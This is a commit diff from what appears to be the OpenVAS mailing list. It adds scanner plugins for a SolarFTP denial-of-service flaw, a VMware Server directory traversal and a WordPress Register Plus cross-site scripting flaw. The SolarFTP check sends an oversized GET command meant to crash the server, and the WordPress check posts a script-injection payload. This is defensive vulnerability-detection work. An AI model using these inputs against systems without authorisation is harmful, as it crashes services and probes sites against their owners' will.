--- trunk/openvas-plugins/scripts/gb_solarftp_mult_cmds_dos_vuln.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_solarftp_mult_cmds_dos_vuln.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,113 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_solarftp_mult_cmds_dos_vuln.nasl 12766 2010-12-22 18:15:15Z dec $
+#
+# SolarFTP Server Multiple Commands Denial of Service Vulnerability
+#
+# Authors:
+# Veerendra GG <veerendragg at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(800190);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"8.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("SolarFTP Server Multiple Commands Denial of Service Vulnerability");
+  desc = "
+  Overview: This host is running Solar FTP Server and is prone to denial of
+  service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to the way server handles certain commands 'APPE',
+  'GET', 'PUT', 'NLST' and 'MDTM' along with long data causing Denial of
+  Service.
+
+  Impact:
+  Successful exploitation may allow remote attackers to cause the application
+  to crash.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Solar FTP Server Version 2.0
+
+  Fix: No solution or patch is available as on 22nd December 2010. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.solarftp.com/
+
+  References:
+  http://www.exploit-db.com/exploits/15750/
+
+  ";
+  script_description(desc);
+  script_summary("Determine SolarFTP Server Vulnerable or Not");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_dependencies("find_service.nes");
+  script_require_ports("Services/ftp", 21);
+  exit(0);
+}
+
+##
+## The script code starts here
+##
+
+include("ftp_func.inc");
+
+## Get the default FTP port
+ftpPort = get_kb_item("Services/ftp");
+if(!ftpPort){
+  ftpPort = 21;
+}
+
+## Check FTP Port Status
+if(!get_port_state(ftpPort)){
+  exit(0);
+}
+
+## Confirm the application with FTP banner
+banner = get_ftp_banner(port:ftpPort);
+if("220 " >!< banner || "Solar FTP Server" >!< banner){
+  exit(0);
+}
+
+## Open TCP Socket
+soc = open_sock_tcp(ftpPort);
+if(!soc) {
+  exit(0);
+}
+resp =  recv_line(socket:soc, length:100);
+
+## Construct and send attack request
+attack = string("GET ", crap(data: raw_string(0x41), length: 80000), "\r\n");
+send(socket:soc, data:attack);
+resp = recv_line(socket:soc, length:260);
+
+## Check the response, Server crashed if no response
+if(!resp)
+{
+  security_hole(port:ftpPort);
+  exit(0);
+}
+
+## Close FTP socket
+ftp_close(socket:soc);

Added: trunk/openvas-plugins/scripts/gb_vmware_web_server_dir_trav_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_vmware_web_server_dir_trav_vuln_win.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_vmware_web_server_dir_trav_vuln_win.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_vmware_web_server_dir_trav_vuln_win.nasl 12350 2010-12-03 11:11:11Z dec $
+#
+# VMware 2 Web Server Directory Traversal Vulnerability (Win)
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801654);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("VMware 2 Web Server Directory Traversal Vulnerability (Win)");
+  desc = "
+  Overview: This host is installed with VMware 2 Web Server and is prone to
+  directory traversal vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an error while handling certain requests, which
+  can be exploited to download arbitrary files from the host system.
+
+  Impact:
+  Successful exploitation will let the attacker to disclose sensitive
+  information.
+
+  Impact Level: Application/System
+
+  Affected Software/OS:
+  VMware Web Server Version 2.0.2
+
+  Fix: No solution or patch is available as on 3rd December 2010. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.vmware.com/products/server/
+
+  References:
+  http://www.exploit-db.com/exploits/15617/
+  http://www.vul.kr/vmware-2-web-server-directory-traversal ";
+
+  script_description(desc);
+  script_summary("Check for the version of VMware Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_dependencies("gb_vmware_prdts_detect_win.nasl");
+  script_require_keys("VMware/Server/Win/Ver", "VMware/Win/Installed");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Check for VMware Installed
+if(!get_kb_item("VMware/Win/Installed")){
+  exit(0);
+}
+
+## Get VMware Server Version
+vmserVer = get_kb_item("VMware/Server/Win/Ver");
+if(vmserVer)
+{
+  if(version_is_equal(version:vmserVer, test_version:"2.0.2")){
+    security_warning(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_wordpress_register_plus_mult_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wordpress_register_plus_mult_vuln.nasl	2010-12-23 15:24:46 UTC (rev 9815)
+++ trunk/openvas-plugins/scripts/gb_wordpress_register_plus_mult_vuln.nasl	2010-12-27 08:55:05 UTC (rev 9816)
@@ -0,0 +1,132 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_wordpress_register_plus_mult_xss.nasl 12451 2010-12-20 16:30:17Z dec $
+#
+# WordPress Register Plus Plugin Multiple Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801492);
+  script_version("$Revision$: 1.0");
+  script_bugtraq_id(45057);
+  script_cve_id("CVE-2010-4402", "CVE-2010-4403");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("WordPress Register Plus Plugin Multiple Vulnerabilities");
+  desc = "
+  Overview: The host is running WordPress Register Plus Plugin and is prone
+  to multiple vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are due to,
+  - Input passed via the 'firstname', 'lastname', 'website', 'aim', 'yahoo',
+    'jabber', 'about', 'pass1', and 'pass2' parameters to 'wp-login.php'
+    (when 'action' is set to 'register') is not properly sanitised before being
+    returned to the user.
+  - A direct request to 'dash_widget.php' and 'register-plus.php' allows
+    remote attackers to obtain installation path in an error message.
+
+  Impact:
+  Successful exploitation could allow an attacker to execute arbitrary HTML
+  and script code in a user's browser session in the context of an affected
+  site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  WordPress Register Plus 3.5.1
+
+  Fix: No solution or patch is available as on 20th December, 2010. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://wordpress.org/extend/plugins/register-plus/
+
+  References:
+  http://websecurity.com.ua/4539
+  http://secunia.com/advisories/42360
+  http://packetstormsecurity.org/files/view/96143/registerplus-xss.txt
+  http://www.securityfocus.com/archive/1/archive/1/514903/100/0/threaded ";
+
+  script_description(desc);
+  script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+  script_summary("Check if WordPress Register Plus Plugin is vulnerable to Cross-Site Scripting");
+  script_category(ACT_ATTACK);
+  script_family("Web application abuses");
+  script_dependencies("secpod_wordpress_detect_900182.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+wpPort = get_http_port(default:80);
+if(!wpPort){
+  exit(0);
+}
+
+## Get WordPress Path from KB
+wpVer = get_kb_item("www/" + wpPort + "/WordPress");
+if(!wpVer){
+  exit(0);
+}
+
+wpVer = eregmatch(pattern:"^(.+) under (/.*)$", string:wpVer);
+if(wpVer[2] != NULL)
+{
+  ## Try an exploit
+  filename = string(wpVer[2] + "/wp-login.php?action=register");
+  host = get_host_name();
+  authVariables = "user_login=abc&user_email=abc%40gmail&firstname=&lastname=" +
+                  "&website=&aim=&yahoo=&jabber=&about=&pass1=%22%3E%3Cscript" +
+                  "%3Ealert%28document.cookie%29%3C%2Fscript%3E&pass2=%22%3E%" +
+                  "3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E";
+
+  ## Construct post request
+  sndReq2 = string("POST ", filename, " HTTP/1.1\r\n",
+                   "Host: ", host, "\r\n",
+                   "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n",
+                   "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
+                   "Accept-Language: en-us,en;q=0.5\r\n",
+                   "Accept-Encoding: gzip,deflate\r\n",
+                   "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n",
+                   "Keep-Alive: 115\r\n",
+                   "Connection: keep-alive\r\n",
+                   "Referer: http://", host, filename, "\r\n",
+                   "Cookie: wordpress_test_cookie=WP+Cookie+check; wpss_firstvisit=1; wpss_safesearch=1\r\n",
+                   "Content-Type: application/x-www-form-urlencoded\r\n",
+                   "Content-Length: ", strlen(authVariables), "\r\n\r\n",
+                    authVariables);
+
+  rcvRes2 = http_keepalive_send_recv(port:wpPort, data:sndReq2);
+
+  ## Check the response to confirm vulnerability
+  if(egrep(pattern:"^HTTP/.* 200 OK", string:rcvRes2) &&
+            ("><script>alert(document.cookie)</script>" >< rcvRes2))
+  {
+      security_warning(wpPort);
+      exit(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/gb_wordpress_register_plus_mult_vuln.nasl
___________________________________________________________________
Name: svn:executable
   + *



More information about the Openvas-commits mailing list